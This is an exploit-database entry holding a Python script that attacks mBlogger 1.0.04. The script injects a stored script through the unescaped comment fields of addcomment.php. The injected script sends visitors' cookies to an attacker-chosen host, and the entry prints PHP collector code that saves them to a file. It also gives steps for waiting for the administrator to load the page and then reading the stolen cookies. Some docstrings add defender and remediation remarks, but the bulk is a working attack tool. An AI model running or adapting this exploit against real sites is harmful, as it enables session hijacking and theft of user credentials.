mBlogger 1.0.04 – ‘addcomment.php’ Persistent Cross-Site Scripting

  • 作者: Ptrace Security
    日期: 2010-09-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14890/
  • #!/usr/bin/python
    #
    # Exploit Title: mBlogger v1.0.04 (addcomment.php) Persistent XSS Exploit
    # Date : 04 September 2010
    # Author : Ptrace Security (Gianni Gnesa [gnix])
    # Contact: research[at]ptrace-security[dot]com
    # Software Link: http://sourceforge.net/projects/mblogger/
    # Version: 1.0.04
    # Tested on: EasyPHP 5.3.1.0 for Windows
    #
    #
    # Description
    # ===========
    #
    # + addcomment.php => An SQL Injection at line 32 allows inserting JavaScript
    # that is executed in the client's browser when they
    # visit the page viewpost.php?postID=<number>.
    #
    # 29: $commentAuthor = $_POST['commentAuthor'];
    # 30: $commentText = $_POST['commentText'];
    # 31: $postID = $_GET['postID'];
    # 32: $query = "INSERT INTO comments (user, comment, postid) VALUES
    # ('$commentAuthor', '$commentText', '$postID')";
    # 33: if(!mysql_query($query, $connection))
    # 34: {
    # 35:die("Error updating post: " . mysql_error());
    # 36: }
    #
    
    import sys
    import http.client
    import urllib.parse
    
    
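    def fatal(message):
        """Print *message* and terminate the program with exit status 1.

        Args:
            message: Text reported to the user on stdout before exiting.

        Raises:
            SystemExit: always, with code 1.
        """
        print(message)
        # sys.exit rather than the site-provided ``exit`` builtin: the latter is
        # meant for interactive sessions and is not defined under ``python -S``.
        sys.exit(1)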
    
    
    def usage(program):
        """Print the command-line synopsis followed by two invocation examples.

        Args:
            program: The script name as invoked, normally ``sys.argv[0]``.
        """
        # First line keeps its trailing newline so a blank line separates the
        # synopsis from the examples, exactly as printed before.
        lines = (
            f"Usage: {program} <victim> <mBlogger path> <attacker>\n",
            f"Example: {program} localhost /mBlogger/ localhost",
            f" {program} www.victim.com /path/ www.attacker.com",
        )
        for line in lines:
            print(line)
    
    
    def getRemotePHPCode():
        """Return the PHP source of the collector endpoint referenced by the injected script.

        The snippet reads the ``c`` query parameter, splits it on ``"; "`` (the
        separator ``document.cookie`` uses between cookies), and appends each
        URL-decoded ``name=value`` pair to ``data.txt``; fragments without an
        ``=`` are recorded as ``cannot decode ...``. It is only printed here for
        the operator to host elsewhere; nothing is executed locally.

        Defender note: cookies flagged ``HttpOnly`` are not visible to
        ``document.cookie`` and therefore never reach this endpoint; an outbound
        request carrying a cookie string in its query to a third-party host is
        the observable artefact of this kind of payload.

        Returns:
            The PHP code as a single string.
        """
        source= '<?php\n'
        source += '$cs = explode("; ", $_GET[\'c\']);\n'
        # Opened in append mode, so every victim visit adds to the same file.
        source += '$fp = fopen(\'data.txt\',\'a\');\n'
        source += 'if(!empty($cs))\n'
        source += ' foreach($cs as $k => $v) {\n'
        # Non-greedy match up to the first '=' separates the cookie name from its value.
        source += 'if(preg_match("/^(.*?)\=(.*)$/", $v, $r))\n'
        source += ' fwrite($fp,urldecode($r[1])."=".urldecode($r[2])."\\r\\n");\n'
        source += 'else fwrite($fp, "cannot decode $v");\n'
        source += ' }\n'
        source += 'fclose($fp);\n'
        source += '?>'
        return source
    
    
    def injectJavascript(victim, path, attacker):
        """POST a comment containing a ``<script>`` element to ``addcomment.php``.

        The stored comment text is the script shown below, which loads an image
        from ``http://<attacker>/c.php?c=<escaped document.cookie>``. The header
        of this file quotes the vulnerable code: ``commentAuthor`` and
        ``commentText`` are interpolated directly into the INSERT statement with
        no escaping, and presumably ``viewpost.php`` renders the stored comment
        without HTML-encoding it (that code is not shown here). A parameterised
        INSERT plus output encoding on display removes both issues.

        Args:
            victim: Host (and optional ``:port``) of the mBlogger install.
            path: URL path prefix of the install; ``addcomment.php`` is appended
                directly, so it must end with ``/``.
            attacker: Host the injected script reports to.

        Returns:
            ``True`` when the server answers HTTP 200, ``False`` otherwise. A 200
            only means the request was accepted; it does not confirm the comment
            was stored.
        """
        payload= '<script>\nd=new Image;\nd.src=\"http://' + attacker
        payload += '/c.php?c=\"+escape(document.cookie);\n</script>\n'

        headers = {'Content-type':'application/x-www-form-urlencoded','Accept':'text/plain'}
        params= urllib.parse.urlencode({'commentAuthor':'admin','commentText':payload,'submitcomment':'Submit'})
        con = http.client.HTTPConnection(victim)

        # postID is fixed to 1; exploit() prints the matching viewpost.php URL.
        con.request('POST', path + 'addcomment.php?postID=1', params, headers)
        res = con.getresponse()
        if res.status != 200:
            # NOTE: the connection is not closed on this path.
            return False

        con.close()
        return True
    
    
    def exploit(victim, path, attacker):
        """Run the full sequence: inject the comment, then print the collector code and next steps.

        Terminates via ``fatal`` when ``injectJavascript`` reports a non-200
        response. Everything after the injection is output for the operator;
        this function does not host the collector or read ``data.txt`` itself.

        Args:
            victim: Host of the mBlogger install.
            path: URL path prefix of the install.
            attacker: Host that will serve ``c.php`` and receive the requests.
        """
        print('[+] Injecting Javascript')
        success = injectJavascript(victim, path, attacker)
        if not success:
            fatal('[!] Injection failed')

        print('[+] Generating PHP code for malicious site\n')
        print(getRemotePHPCode() + '\n')

        print('[?] Instruction to use this exploit:')
        print('1. Save the previous code in http://' + attacker + '/c.php')
        print('2. Wait that the administrator visits ')
        # Inserts a '/' between victim and path, unlike injectJavascript, which
        # concatenates path directly; with a leading '/' in path the printed
        # URL therefore contains a double slash.
        print(' http://'+ victim +'/'+ path +'viewpost.php?postID=1')
        print('3. Read stolen cookies from http://'+ attacker +'/' + 'data.txt')
        return
    
    
    
    # Script entry point. There is no ``if __name__ == "__main__"`` guard, so the
    # banner and the argument check run on import as well.
    print('\n+-----------------------------------------------------------------------------+')
    print('| mBlogger v1.0.04 (addcomment.php) Persistent XSS Exploit by Ptrace Security |')
    print('+-----------------------------------------------------------------------------+\n')

    # Exactly three positional arguments are expected: victim, path, attacker.
    if len(sys.argv) != 4:
        usage(sys.argv[0])
    else:
        exploit(sys.argv[1],sys.argv[2], sys.argv[3])